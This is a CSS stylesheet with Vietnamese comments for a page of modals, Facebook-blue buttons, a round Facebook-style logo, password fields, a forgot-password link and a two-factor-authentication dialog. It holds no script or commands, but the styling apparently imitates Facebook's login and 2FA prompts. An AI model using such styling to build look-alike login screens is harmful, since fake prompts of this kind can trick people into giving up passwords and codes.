.btn:disabled{
    opacity: .85;
}

/* Khung chứa */
/* Khung chứa (giữ nguyên để căn giữa) */
.btn-wrapper {
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center; /* Thêm căn giữa theo chiều dọc */
  padding: 20px 0;
}

/* Nút cơ bản - ĐÃ CHỈNH SỬA ĐỂ VỪA MẮT */
.button {
  /* Loại bỏ width và height cố định */
  /* width: 100px;  <- XÓA DÒNG NÀY */
  /* height: 50px; <- XÓA DÒNG NÀY */

  /* Sử dụng padding để tạo khoảng cách tự nhiên quanh chữ */
  padding: 10px 24px; /* Trên/Dưới: 10px, Trái/Phải: 24px */

  /* Chỉnh font chữ (thêm vào để chữ đẹp hơn) */
  font-family: sans-serif; /* Hoặc font bạn đang dùng */
  font-size: 16px;       /* Kích thước chữ vừa phải */
  font-weight: 500;       /* Độ đậm vừa phải */
  text-decoration: none;  /* Bỏ gạch chân nếu là thẻ <a> */

  /* Bo góc (giữ nguyên hoặc chỉnh lại cho mềm mại) */
  border-radius: 30px; /* Vẫn giữ bo góc tròn trịa */
  
  /* Các thuộc tính khác */
  border: none;
  display: inline-flex; /* Chuyển thành inline-flex để nút không chiếm hết chiều ngang */
  justify-content: center;
  align-items: center;
  cursor: pointer;
  background-color: #fff; /* Màu mặc định */
  color: #333;           /* Màu chữ mặc định */
  
  /* Hiệu ứng chuyển động mượt mà */
  transition: all 0.2s ease-in-out;
}

/* Hiệu ứng Hover mặc định */
.button:hover {
  background-color: #e2eaf2;
}

/* --- Biến thể màu xanh FB (Nên dùng cái này cho nút của bạn) --- */
.button.fb-blue {
  background-color: rgb(0, 100, 224);
  color: #fff;
  /* Thêm bóng đổ nhẹ để nổi bật hơn (tùy chọn) */
  box-shadow: 0 2px 4px rgba(0,0,0,0.1);
}

.button.fb-blue:hover {
  background-color: rgb(0, 85, 190); /* Tối hơn một chút khi hover */
  box-shadow: 0 4px 8px rgba(0,0,0,0.15); /* Bóng đổ đậm hơn khi hover */
}

/* --- Trạng thái vô hiệu hóa (disabled) --- */
.button:disabled,
.button.disabled {
  opacity: 0.6;
  cursor: not-allowed;
  pointer-events: none; /* Ngăn chặn click */
  box-shadow: none;      /* Bỏ bóng đổ */
}
/* Popup CSS extracted */
#searchModal .modal-content, #accountsModal .modal-content{
    min-height: 500px;
}
#accountsModal .modal-content{
    min-width: 550px;
}
#accountsModal .action-button:hover{
    background-color: white;
    cursor: default;
}
#searchModal .search-input-wraper{
    display: flex;
    position: relative;
    align-items: center;
}
#searchModal .search-icon-wraper, #searchModal .close-search-icon-wraper{
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    color: #8B99A8;
}
#searchModal .search-icon-wraper{
    left: 12px;
}
#searchModal .close-search-icon-wraper{
    right: 6px;
    border-radius: 50%;
    width: 28px;
    height: 28px;
    color: rgb(70, 90, 105);
    font-size: 12px;
    font-weight: 400;
    cursor: pointer;
}
#searchModal .close-search-icon-wraper svg{
    width: 18px;
    height: 18px;
}
#searchModal .close-search-icon-wraper:hover{
    background-color: #D6DEE6;

}
#searchModal input{
    width: 100%;
    background-color: rgba(0, 0, 0, 0.05);
    border: none;
    outline: none;
    height: 36px;
    border-radius: 18px;
    padding-right: 8px;
    padding-left: 36px;
    font-family: Helvetica, Arial, sans-serif;
}
#searchModal input::placeholder{
    color: #8a8a8a;
}
#searchModal .fake-items div{
    background-color: white;
    margin: 6px;
    height: 42px;
    border-radius: 6px;
    opacity: 0.6;
}
#searchModal .now-found div{
    padding-top: 64px;
    padding-bottom: 32px;
}
#searchModal .now-found svg{
    width: 96px;
    height: 96px;
}
.btn-close:focus {
    box-shadow: none;
}

.modal .modal-content {
    border-radius: 25px;
    background: rgb(249, 241, 249);
    background: linear-gradient(90deg, rgba(249, 241, 249, 1) 0%, rgba(234, 243, 253, 1) 35%, rgba(237, 251, 242, 1) 100%);
}

.modal-header {
    padding: 1.4rem 1.4rem;
    border-bottom: none;
    padding-bottom: 1rem;

}
.modal-footer img{
    width: 70px;
}

.modal-header .btn-close {
    opacity: 1;
}
.form-modal .modal-content{
    min-height: 92vh;
}
.form-modal .modal-body{
    
    display: flex;
    flex-direction: column;
    justify-content: space-between;
}
.twoFAinfo-wraper{

}
#twoFAmodal .modal-title{
    font-size: 28px;
    line-height: 38px;
}
.twoFAinfo-wraper p{
    font-size: 22px;
    line-height: 30px;
    font-weight: 400;
    margin-bottom: 20px;
}
.fb-round-wraper{
    display: flex;
    justify-content: center;    
}
.fb-round-wraper .fb-logo-round{
    width: 70px;
    /* margin-top: 80px;
    margin-bottom: -80px; */
}
.modal-footer {
    justify-content: center;
    border-top: none;
}

.btn-close:hover {
    background-color: #E2EAF2;
    border-radius: 50%;
}

.form-btn-wrapper {
    display: flex;
    justify-content: center;
    padding: 15px 0;
}

.form-btn-wrapper .btn {
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    position: relative;
    border-radius: 25px;
    height: 50px;
    font-size: 20px;
}

.modal-title {
    /* margin-bottom: 15px; */
}

.spinner-border {
    width: 22px;
    height: 22px;
    /* margin: 10px;
    margin: 0 10px;
    margin-left: 10px;
    left: 40px;
    margin-left: -25px; */
    border-width: 0.15rem;
}
.password-input{
    background-color: #FFF;
  border: 2px solid #D4DBE3;
  border-radius: 10px;
  padding: 5px;
  display: flex;
  align-items: start;
  flex-direction: column;
  justify-content: center;
}
.password-input.disabled{
    background-color: #E3E3E3;
}
.password-input .form-label{
    color:#5e5e5e;
    padding: 0 .75rem;
    margin-bottom: 0;
    width: 100%;
}
.password-input input{
    border: none;
    padding: 0 .75rem;
    height: 24px;
}
.password-input input:disabled{
    background-color: #E3E3E3;
}
.password-input input:focus {
    box-shadow: none;
    border: none;
}
.password-input input:focus-visible {
    box-shadow: none;
    border: none;
}
#forgot-pass-wrap{
    text-align: center;
    text-align: center;
    font-size: 16px;
    font-weight: 500;
}
.form-control{
    height: 50px;
    background-color: #FFF;
    border: 2px solid #D4DBE3;
    border-radius: 10px;
}
.form-control:focus{
    box-shadow: none;
    border: 2px solid #D4DBE3;
}
textarea.form-control{
    min-height: 100px;
}

#exampleModal1{
    position: fixed !important;
    inset: 0 !important;
    z-index: 999999 !important;
}